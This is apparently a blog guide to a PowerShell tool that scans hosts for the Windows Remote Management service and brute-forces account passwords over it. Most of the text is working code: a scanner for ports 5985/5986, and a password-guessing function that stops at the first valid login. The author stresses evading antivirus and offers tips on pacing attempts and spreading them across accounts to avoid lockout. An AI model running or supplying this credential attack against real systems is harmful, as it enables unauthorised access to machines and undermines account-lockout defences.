WinRM_Brute_Scanner Guide


WinRM_Brute_Scanner.ps1 allows you to scan and brute force the WinRM service remotely.


I wrote this script to be able to scan for the WinRM service on Windows systems. Because it uses only built-in PowerShell cmdlets, no additional modules are required and it is less likely to be flagged by AV than a compiled tool (though that is not guaranteed). Once valid credentials are obtained, remote commands can be run over the same WinRM channel.

Download: https://github.com/ctrlaltdel-blog/WinRM_Brute_Scanner

WinRM Ports:

  • Port: 5985 (HTTP)
  • Port: 5986 (HTTPS)

To find out more about the service: https://docs.microsoft.com/en-us/windows/win32/winrm/installation-and-configuration-for-windows-remote-management

Importing Module

First you must download and import the module:

Import-Module [Script location]

Scanning

To scan the device, we can use the function: winrm_scanner

Once run, you will need to select 1 of 2 options.

  • Option 1: Single IP
  • Option 2: Multiple IPs (IP List)

To generate an IP List, you could use this online tool: http://magic-cookie.co.uk/iplist.html

Option 1: Single IP

Simply enter the IP or hostname.

Option 2: IP List

Simply enter the text file location. IPs need to be on separate lines.
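The following is an added example of how a scan like this works, written for this guide rather than taken from WinRM_Brute_Scanner.ps1. It checks whether 5985 and 5986 accept a TCP connection on one host or on every host in a text file (one per line, as above), and then uses Test-WSMan to confirm the open port really is a WS-Management listener. The function and parameter names are assumptions for illustration; the hosts file path in the usage lines is a placeholder.

```powershell
# Added example, not the script's own code. Port check with a timeout so that
# filtered hosts do not hang the scan.
function Test-WinRMPort {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][int]$Port,
        [int]$TimeoutMs = 2000
    )
    $client = New-Object System.Net.Sockets.TcpClient
    try {
        $async = $client.BeginConnect($ComputerName, $Port, $null, $null)
        if (-not $async.AsyncWaitHandle.WaitOne($TimeoutMs, $false)) { return $false }
        $client.EndConnect($async)
        return $true
    } catch {
        return $false
    } finally {
        $client.Close()
    }
}

# Scans a single target (-Target) or a file of targets (-TargetList), one IP or
# hostname per line, and returns one object per host.
function Invoke-WinRMScan {
    param(
        [string]$Target,
        [string]$TargetList
    )
    $targets = if ($TargetList) {
        Get-Content -Path $TargetList | ForEach-Object { $_.Trim() } | Where-Object { $_ -ne '' }
    } else {
        @($Target)
    }

    foreach ($h in $targets) {
        $http  = Test-WinRMPort -ComputerName $h -Port 5985
        $https = Test-WinRMPort -ComputerName $h -Port 5986
        $wsman = $false
        if ($http -or $https) {
            # Test-WSMan sends an unauthenticated Identify request, so it works
            # before TrustedHosts or credentials are sorted out. It tells an open
            # socket apart from an actual WinRM listener.
            try {
                if ($https -and -not $http) {
                    Test-WSMan -ComputerName $h -UseSSL -ErrorAction Stop | Out-Null
                } else {
                    Test-WSMan -ComputerName $h -ErrorAction Stop | Out-Null
                }
                $wsman = $true
            } catch {
                $wsman = $false
            }
        }
        [pscustomobject]@{
            Host     = $h
            Port5985 = $http
            Port5986 = $https
            WSMan    = $wsman
        }
    }
}

# Usage (placeholder addresses and file path):
# Invoke-WinRMScan -Target 192.168.1.10
# Invoke-WinRMScan -TargetList C:\temp\hosts.txt | Format-Table -AutoSize
```

A host that shows an open port but WSMan = $false is usually a proxy, a firewall that completes the handshake, or a different service on that port, so it is worth excluding before spending a wordlist on it.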

Brute Force

To brute force the service, you can use the winrm_brute function.

You will need to supply the following:

  • IP or Hostname
  • Username
  • Wordlist Location

For this to be successful, you will need to meet the following requirements:

  • Be allowed to authenticate to the target: inside a domain, Kerberos handles this; otherwise the target must be listed in the client's TrustedHosts (check with Get-Item WSMan:\localhost\Client\TrustedHosts) or you must connect over HTTPS
  • Be on the same domain (depending on restrictions)
  • Be able to reach the remote device (Firewall)

Also keep in mind that every failed attempt is logged on the target as a failed logon (Event ID 4625) and counts towards the account lockout threshold, so check the lockout policy (net accounts, or net accounts /domain) before running a long wordlist against a single account.
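As an added example of the brute-force step (written for this guide, not the project's winrm_brute function), the block below takes the same three inputs, IP or hostname, username and wordlist, and tries each password with New-PSSession, stopping at the first one that opens a session. It separates an "Access is denied" response (wrong password, keep going) from transport or TrustedHosts errors (no point continuing) by matching on the error text; that matching is an assumption about the WinRM client's messages and should be checked against your own environment. The function and parameter names and the file paths in the usage lines are placeholders.

```powershell
# Added example, not the script's own code. Reads the lockout threshold from
# "net accounts" so the caller can decide how many attempts are safe.
function Get-LockoutThreshold {
    param([switch]$Domain)
    $out = if ($Domain) { net accounts /domain } else { net accounts }
    $line = $out | Where-Object { $_ -match '^Lockout threshold:\s+(.+)$' }
    if ($line -and $line -match '^Lockout threshold:\s+(.+)$') {
        $value = $Matches[1].Trim()
        if ($value -eq 'Never') { return 0 }   # 0 = no lockout
        return [int]$value
    }
    return $null
}

# Tries each password in $Wordlist for one account over WinRM. Returns an object
# with Success = $true and the password on a hit, Success = $false if the list
# is exhausted, or $null if a non-authentication error stopped the run.
function Invoke-WinRMBrute {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][string]$UserName,
        [Parameter(Mandatory)][string]$Wordlist,
        [switch]$UseSSL,
        [int]$DelayMs = 0      # pause between attempts to stay under a lockout threshold
    )
    $passwords = Get-Content -Path $Wordlist | Where-Object { $_ -ne '' }
    $attempt = 0

    foreach ($pw in $passwords) {
        $attempt++
        $secure = ConvertTo-SecureString -String $pw -AsPlainText -Force
        $cred = New-Object System.Management.Automation.PSCredential($UserName, $secure)
        try {
            $session = New-PSSession -ComputerName $ComputerName -Credential $cred -UseSSL:$UseSSL -ErrorAction Stop
            Remove-PSSession -Session $session
            return [pscustomobject]@{
                Host     = $ComputerName
                UserName = $UserName
                Password = $pw
                Attempts = $attempt
                Success  = $true
            }
        } catch {
            $msg = $_.Exception.Message
            # Assumption: a bad password surfaces as "Access is denied"; anything
            # else (TrustedHosts, unreachable host, SSL failure) will not be fixed
            # by trying the next password, so stop rather than burn the wordlist.
            if ($msg -match 'Access is denied') {
                if ($DelayMs -gt 0) { Start-Sleep -Milliseconds $DelayMs }
                continue
            }
            Write-Warning "Stopping after attempt ${attempt}: $msg"
            return $null
        }
    }

    return [pscustomobject]@{
        Host     = $ComputerName
        UserName = $UserName
        Password = $null
        Attempts = $attempt
        Success  = $false
    }
}

# Usage (placeholder host, account and wordlist path):
# Get-LockoutThreshold -Domain
# Invoke-WinRMBrute -ComputerName 192.168.1.10 -UserName 'administrator' -Wordlist C:\temp\words.txt -DelayMs 500
```

If Get-LockoutThreshold returns a number greater than zero, keep the wordlist shorter than that value per observation window, or spread attempts across accounts rather than passwords, otherwise the account locks long before the list is exhausted.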
